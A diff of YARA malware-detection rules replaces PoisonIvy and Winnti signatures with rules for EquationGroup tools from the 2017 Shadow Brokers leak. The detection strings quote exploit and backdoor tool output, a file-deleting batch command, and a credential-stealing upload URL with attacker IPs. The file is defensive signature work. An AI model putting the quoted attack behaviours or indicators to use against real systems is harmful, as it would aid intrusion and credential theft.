 
 	strings:
-		$s0 = "pidll.dll" fullword ascii
-		$s1 = "sens32.dll" fullword wide
-		$s3 = "FileDescription" fullword wide
-		$s4 = "OriginalFilename" fullword wide
-		$s5 = "ZwSetInformationProcess" fullword ascii
-		$s9 = "Microsoft Media Device Service Provider" fullword wide
+		$x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
+		$x2 = "Logging out of WebAdmin (as target account)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regread_1_1_1 : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d64ccd2-add8-5749-8178-f2c5336e1495"
-		date = "2015-06-03"
+		id = "99a2b146-a277-5917-9a84-3d396d2c8bf9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L24-L58"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1818-L1832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "333f956bf3d5fc9b32183e8939d135bc0fcc5770"
-		logic_hash = "58d62278d776c9f7c3ae0815aa4b248f85c5fc648405b8d1ba2b8eb2847e1e88"
-		score = 70
-		quality = 83
+		logic_hash = "5bf833d7fb073ad74037cf6df4729c75d50641a46a962aee8deac19e31b74419"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
 
 	strings:
-		$s0 = "pidll.dll" fullword ascii
-		$s1 = "sens32.dll" fullword wide
-		$s2 = "9.0.1.56" fullword wide
-		$s3 = "FileDescription" fullword wide
-		$s4 = "OriginalFilename" fullword wide
-		$s5 = "ZwSetInformationProcess" fullword ascii
-		$s6 = "\"%=%14=" fullword ascii
-		$s7 = "091A1G1R1_1g1u1z1" fullword ascii
-		$s8 = "gHsMZz" fullword ascii
-		$s9 = "Microsoft Media Device Service Provider" fullword wide
-		$s10 = "Copyright (C) Microsoft Corp." fullword wide
-		$s11 = "MFC42.DLL" fullword ascii
-		$s12 = "MSVCRT.dll" fullword ascii
-		$s13 = "SpecialBuild" fullword wide
-		$s14 = "PrivateBuild" fullword wide
-		$s15 = "Comments" fullword wide
-		$s16 = "040904b0" fullword wide
-		$s17 = "LegalTrademarks" fullword wide
-		$s18 = "CreateThread" fullword ascii
-		$s19 = "ntdll.dll" fullword ascii
-		$s20 = "_adjust_fdiv" ascii
+		$s1 = "[+] Connected to the Registry Service" fullword ascii
+		$s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 47KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Englishmansdentist_1_2_0 : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2e0bf75-7704-585f-b2b3-727d14946c76"
-		date = "2015-06-03"
+		id = "76367c53-9b48-59a1-9ac9-8649fd833fe3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L60-L76"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1834-L1848"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "df3e1668ac20edecc12f2c1a873667ea1a6c3d6a"
-		logic_hash = "96f8324dcf85f5baa64178774abf17516a9e023dd6fa38e2bce0fe5159a4f704"
-		score = 70
+		logic_hash = "cd415731c1c8398d2b0b1758c4e7eb3e708620b269f9312cf0a750ab2099162e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
 
 	strings:
-		$s0 = "\\notepad.exe" ascii
-		$s1 = "\\RasAuto.dll" ascii
-		$s3 = "winlogon.exe" fullword ascii
+		$x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
+		$x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy Sample APT"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02bf546b-99a2-5ffb-8ee7-7bb005ef953b"
-		date = "2015-06-03"
+		id = "df3b0794-cbbd-530c-8425-fdf4b116b870"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L79-L101"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1850-L1870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "558f0f0b728b6da537e2666fbf32f3c9c7bd4c0c"
-		logic_hash = "7ba10269d31e985dff582ae4103ef1179172ae475e078161864f185380bb5035"
-		score = 70
+		logic_hash = "faeac75104a15cac8528663a82eadbc7bc22cc0a1d1a3b3dfccb6ea46fb24a67"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
+		hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
+		hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s1 = "idll.dll" fullword ascii
-		$s2 = "mgmts.dll" fullword wide
-		$s3 = "Microsoft(R) Windows(R)" fullword wide
-		$s4 = "ServiceMain" fullword ascii
-		$s5 = "Software installation Service" fullword wide
-		$s6 = "SetServiceStatus" fullword ascii
-		$s7 = "OriginalFilename" fullword wide
-		$s8 = "ZwSetInformationProcess" fullword ascii
+		$s1 = "NtErrorMoreProcessingRequired" fullword ascii
+		$s2 = "Command Format Error: Error=%x" fullword ascii
+		$s3 = "NtErrorPasswordRestriction" fullword ascii
+		$op0 = { 8a 85 58 ff ff ff 88 43 4d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 2 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_5 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance_2 : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61f7efd4-745a-5f06-a66d-b4b2a2ecc614"
-		date = "2015-06-03"
+		id = "40066023-ede9-5669-8b4d-a26a693d8818"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L103-L123"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1872-L1889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "545e261b3b00d116a1d69201ece8ca78d9704eb2"
-		logic_hash = "3f88b673b80b67a110915285a87ead265ad0176ea414426ba55e780e3aa396fe"
-		score = 70
+		logic_hash = "481a08bc73ac66245c0712599a61cccdf5127276a09a67cf894f76b7763c5c9b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+		hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s2 = "pidll.dll" fullword ascii
-		$s3 = "\\mspmsnsv.dll" ascii
-		$s4 = "\\sfc.exe" ascii
-		$s13 = "ServiceMain" fullword ascii
-		$s15 = "ZwSetInformationProcess" fullword ascii
-		$s17 = "LookupPrivilegeValueA" fullword ascii
+		$x1 = "[+] Backdoor shellcode written" fullword ascii
+		$x2 = "[*] Attempting exploit method %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Emphasismine : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f364fad0-3684-5500-b21b-396f1e259217"
-		date = "2015-06-03"
+		id = "cc684f39-4971-52e0-b5ec-d28c7ce7032b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L126-L164"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1891-L1910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d77fd224b8d2dfd506faf0d3e359bf04172cc2854dc737e05c4bf99d0e1f3f7"
-		score = 70
+		logic_hash = "20ec32f5e9e439fb212985d5ae104ae5742231f594423cd125a9e64ed6eb234a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c2630ab9b56c00fd748a631098fa4339f46d42b"
-		hash2 = "36b4cbc834b2f93a8856ff0e03b7a6897fb59bd3"
+		super_rule = 1
+		hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
+		hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
 
 	strings:
-		$x1 = "124.133.252.150" fullword ascii
-		$x3 = "http://124.133.254.171/up/up.asp?id=%08x&pcname=%s" fullword ascii
-		$z1 = "\\temp\\si.txt" ascii
-		$z2 = "Daemon Dynamic Link Library" fullword wide
-		$z3 = "Microsoft Windows CTF Loader" fullword wide
-		$z4 = "\\tappmgmts.dll" ascii
-		$z5 = "\\appmgmts.dll" ascii
-		$s0 = "%USERPROFILE%\\AppData\\Local\\Temp\\Low\\ctfmon.log" fullword ascii
-		$s1 = "%USERPROFILE%\\AppData\\Local\\Temp\\ctfmon.tmp" fullword ascii
-		$s2 = "\\temp\\ctfmon.tmp" ascii
-		$s3 = "SOFTWARE\\Classes\\http\\shell\\open\\commandV" fullword ascii
-		$s4 = "CONNECT %s:%i HTTP/1.0" fullword ascii
-		$s5 = "start read histry key" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii
-		$s7 = "[password]%s" fullword ascii
-		$s8 = "Daemon.dll" fullword ascii
-		$s9 = "[username]%s" fullword ascii
-		$s10 = "advpack" fullword ascii
-		$s11 = "%s%2.2X" fullword ascii
-		$s12 = "advAPI32" fullword ascii
+		$x1 = "Error: Could not calloc() for shellcode buffer" fullword ascii
+		$x2 = "shellcodeSize: 0x%04X + 0x%04X + 0x%04X = 0x%04X" fullword ascii
+		$x3 = "Generating shellcode" fullword ascii
+		$x4 = "([0-9a-zA-Z]+) OK LOGOUT completed" fullword ascii
+		$x5 = "Error: Domino is not the expected version. (%s, %s)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 8 of ( $s* ) ) or ( 1 of ( $z* ) and 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_7 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT sample set"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "01224053-d95e-5144-981b-76cd7e57e1c3"
-		date = "2015-06-03"
+		id = "40066023-ede9-5669-8b4d-a26a693d8818"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L166-L185"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1912-L1930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9480cf544beeeb63ffd07442233eb5c5f0cf03b3"
-		logic_hash = "28db3fb7fa5b5e60ad1d1cc2b6d3d9d30a1948491105439201574ca354eb8bd1"
-		score = 70
+		logic_hash = "757740038b9b1e1d099bb208104e9f48e7eb57ffb2de09e83c66df7914b816cb"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
 
 	strings:
-		$s0 = "Microsoft Software installation Service" fullword wide
-		$s2 = "pidll.dll" fullword ascii
-		$s10 = "ServiceMain" fullword ascii
-		$s11 = "ZwSetInformationProcess" fullword ascii
-		$s12 = "Software installation Service" fullword wide
-		$s13 = "Microsoft(R) Windows(R) Operating System" fullword wide
+		$x1 = "[-] Error: Exploit choice not supported for target OS!!" fullword ascii
+		$x2 = "Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed" fullword ascii
+		$x3 = "[-] Error: Backdoor not present on target" fullword ascii
+		$x4 = "***********    TARGET ARCHITECTURE IS X64    ************" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them ) or 2 of them
 }
-rule SIGNATURE_BASE_Poisonivy_RAT_Ssmuidll : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen4 : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT DLL mentioned in Palo Alto Blog in April 2016"
-		author = "Florian Roth (Nextron Systems) (with the help of yarGen and Binarly)"
-		id = "f2535b70-cf17-5435-9fc8-2dfdf70d95ac"
-		date = "2016-04-22"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f935c942-02a4-59b3-89ce-e5e3fa1cacda"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/WiwtYT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L196-L230"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1932-L1963"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d048d88cac40f4fe3affee8d9dad35a7347a5459fbdd56b08a77ece4f6c2ac08"
+		logic_hash = "68a85b4109a2222dce0625aae8a55541206b9275236232e5049e5b4ee28d8e52"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7a424ad3f3106b87e8e82c7125834d7d8af8730a2a97485a639928f66d5f6bf4"
-		hash2 = "6eb7657603edb2b75ed01c004d88087abe24df9527b272605b8517a423557fe6"
-		hash3 = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
-		hash4 = "8b805f508879ecdc9bba711cfbdd570740c4825b969c1b4db980c134ac8fef1c"
-		hash5 = "ac99d4197e41802ff9f8852577955950332947534d8e2a0e3b6c1dd1715490d4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "fe7ce2fdb245c62e4183c728bc97e966a98fdc8ffd795ed09da23f96e85dcdcd"
+		hash2 = "0989bfe351342a7a1150b676b5fd5cbdbc201b66abcb23137b1c4de77a8f61a6"
+		hash3 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+		hash4 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
+		hash5 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
+		hash6 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
+		hash7 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
+		hash8 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
+		hash9 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+		hash10 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
+		hash11 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
+		hash12 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
+		hash13 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
+		hash14 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$s1 = "ssMUIDLL.dll" fullword ascii
-		$op1 = { 6a 00 c6 07 e9 ff d6 }
-		$op2 = { 02 cb 6a 00 88 0f ff d6 47 ff 4d fc 75 }
-		$op3 = { 6a 00 88 7f 02 ff d6 }
+		$x1 = "[+] \"TargetPort\"      %hu" fullword ascii
+		$x2 = "---<<<  Complete  >>>---" fullword ascii
+		$x3 = "[+] \"NetworkTimeout\"  %hu" fullword ascii
+		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( all of ( $op* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_Winnti_Signing_Cert : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen1 : FILE
 {
 	meta:
-		description = "Detects a signing certificate used by the Winnti APT group"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0cf185eb-fb8d-5e1f-9089-4f36eb4798de"
-		date = "2015-10-10"
+		id = "98b0a398-7761-5506-bd2f-117c118df11f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L9-L26"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1965-L1984"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fd5f2808e7d683b9c4b7f5d4ccfd0eb87037eb2e70700b2c083db8c6ddf4a26"
+		logic_hash = "cd40d51ba26706517dae332d84f574eb206a424693cfb586375695e364990b5d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
-		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		super_rule = 1
+		hash1 = "1b5b33931eb29733a42d18d8ee85b5cd7d53e81892ff3e60e2e97f3d0b184d31"
+		hash2 = "139697168e4f0a2cc73105205c0ddc90c357df38d93dbade761392184df680c7"
 
 	strings:
-		$s1 = "Guangzhou YuanLuo Technology Co." ascii
-		$s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
-		$s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
+		$x1 = "Restart with the new protocol, address, and port as target." fullword ascii
+		$x2 = "TargetPort      : %s (%u)" fullword ascii
+		$x3 = "Error: strchr() could not find '@' in account name." fullword ascii
+		$x4 = "TargetAcctPwd   : %s" fullword ascii
+		$x5 = "Creating CURL connection handle..." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_Winnti_Malware_Nsiproxy : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen2 : FILE
 {
 	meta:
-		description = "Detects a Winnti rootkit"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b14541c-6077-5f3b-8f73-ff3d283bf209"
-		date = "2015-10-10"
+		id = "e47de7dd-8a37-5d0d-9af2-2a30fa000b05"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L28-L54"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1986-L2012"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "742b091cc630ecea995be8d022eabadef1725dbd952f66a9ca62ecdee6985733"
+		logic_hash = "2c0833e92e23d595ebcf4af042febc44fba594356a647eb98e48b6fabf018d72"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
-		hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
-		hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
-		hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
-		hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
+		super_rule = 1
+		hash1 = "7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5"
+		hash2 = "561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e"
+		hash3 = "f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b"
+		hash4 = "8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba"
 
 	strings:
-		$x1 = "\\Driver\\nsiproxy" wide
-		$a1 = "\\Device\\StreamPortal" wide
-		$a2 = "\\Device\\PNTFILTER" wide
-		$s1 = "Cookie: SN=" fullword ascii
-		$s2 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
-		$s3 = "Winqual.sys" fullword wide
-		$s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide
-		$s5 = "http://www.wasabii.com.tw 0" fullword ascii
+		$s1 = "[+] Setting password : (NULL)" fullword ascii
+		$s2 = "[-] TbBuffCpy() failed!" fullword ascii
+		$s3 = "[+] SMB negotiation" fullword ascii
+		$s4 = "12345678-1234-ABCD-EF00-0123456789AB" fullword ascii
+		$s5 = "Value must end with 0000 (2 NULLs)" fullword ascii
+		$s6 = "[*] Configuring Payload" fullword ascii
+		$s7 = "[*] Connecting to listener" fullword ascii
+		$op1 = { b0 42 40 00 89 44 24 30 c7 44 24 34 }
+		$op2 = { eb 59 8b 4c 24 10 68 1c 46 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $x1 and 1 of ( $a* ) and 2 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of ( $s* ) and 1 of ( $op* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_Winnti_Malware_Updatedll : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gen3 : FILE
 {
 	meta:
-		description = "Detects a Winnti malware - Update.dll"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6896191-d856-55f2-a47f-621a4f10d0c7"
-		date = "2015-10-10"
+		id = "7951fac1-9d5f-5991-a19a-88f3c8402e39"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L56-L89"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2014-L2042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4b483e77106cc0e2f8ed2398de8b34b8246472875ad3e0612fa06cac96b7e6aa"
+		logic_hash = "99b293d441fd27a6295e6a93123cf45e787472fb61575d566e7b4e0c61226fdb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
-		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
-		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
-		hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		super_rule = 1
+		hash1 = "270850303e662be53d90fa60a9e5f4bd2bfb95f92a046c77278257631d9addf4"
+		hash2 = "7a086c0acb6df1fa304c20733f96e898d21ca787661270f919329fadfb930a6e"
+		hash3 = "c236e0d9c5764f223bd3d99f55bd36528dfc0415e14f5fde1e5cdcada14f4ec0"
+		hash4 = "9d98e044eedc7272823ba8ed80dff372fde7f3d1bece4e5affb21e16f7381eb2"
+		hash5 = "dfce29df4d198c669a87366dd56a7426192481d794f71cd5bb525b08132ed4f7"
